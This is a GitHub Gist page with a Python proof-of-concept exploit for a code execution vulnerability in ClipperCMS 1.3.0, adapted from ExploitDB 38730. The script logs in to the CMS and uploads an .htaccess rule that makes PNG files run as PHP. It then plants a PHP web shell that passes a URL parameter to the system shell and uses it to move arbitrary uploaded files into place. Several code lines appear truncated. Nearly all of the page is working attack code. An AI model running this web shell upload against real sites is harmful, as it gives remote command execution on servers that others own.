Skip to content

Instantly share code, notes, and snippets.



Last active Jul 27, 2020
What would you like to do?
Tinyscript Proof-of-Concept tool using PyBots for exploiting a Code Execution vulnerability in ClipperCMS
# Exploit for ClipperCMS 1.3.0 Code Execution vulnerability
# Based on:
from pybots import HTTPBot
from tinyscript import *
__author__ = "Alexandre D'Hondt"
__email__ = ""
__reference__ = ""
__doc__ = """
This tool adapts exploit 38730 of ExploitDB for uploading a Web shell.
class Exploit(HTTPBot):
def __init__(self, url, username, password, **kwargs):
super(Exploit, self).__init__(url, **kwargs)
self.session.headers.update({'Referer': self.url})
# first, try to login
data = {"ajax": "1", "username": username, "password": password}"manager/processors/login.processor.php", data=data)
if "Incorrect username or password" in self.response.text:
self.logger.critical("Bad username or password")
# then, check for upload privilege
if "You don't have enough privileges" in self.response.text:
self.logger.critical("Not enough privileges")
m ="var current_path = '(.*)';", self.response.text)
path = = {'path':}
def _upload(self, filename, content):"manager/index.php?a=31",, files={'userfile[0]': (filename, content)})
def upload(self, filename, content=None):
# upload a remote command PHP script
self._upload(".htaccess", "AddType application/x-httpd-php .png")
self._upload("404.png", "<?php passthru($_GET['x']) ?>")
# upload the file with PNG extension then rename it
tmp, ext = os.path.splitext(filename)
tmp += ".png"
if not content:
with open(filename) as f:
content =
self._upload(tmp, content)
self.get("404.png?x=mv {} {} ".format(tmp, filename))
if self.response.status_code == 200:"File uploaded at {}".format(self.url.rstrip("/") + "/" + filename))
self.logger.critical("File upload failed")
if __name__ == '__main__':
parser.add_argument("-u", "--url", help="base URL of ClipperCMS 1.3.0")
parser.add_argument("--username", help="username")
parser.add_argument("--password", help="password")
parser.add_argument("--file", type=ts.file_exists, required=True, help="file to be uploaded")
with Exploit(args.url, args.username, args.password, verbose=args.verbose) as bot:
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment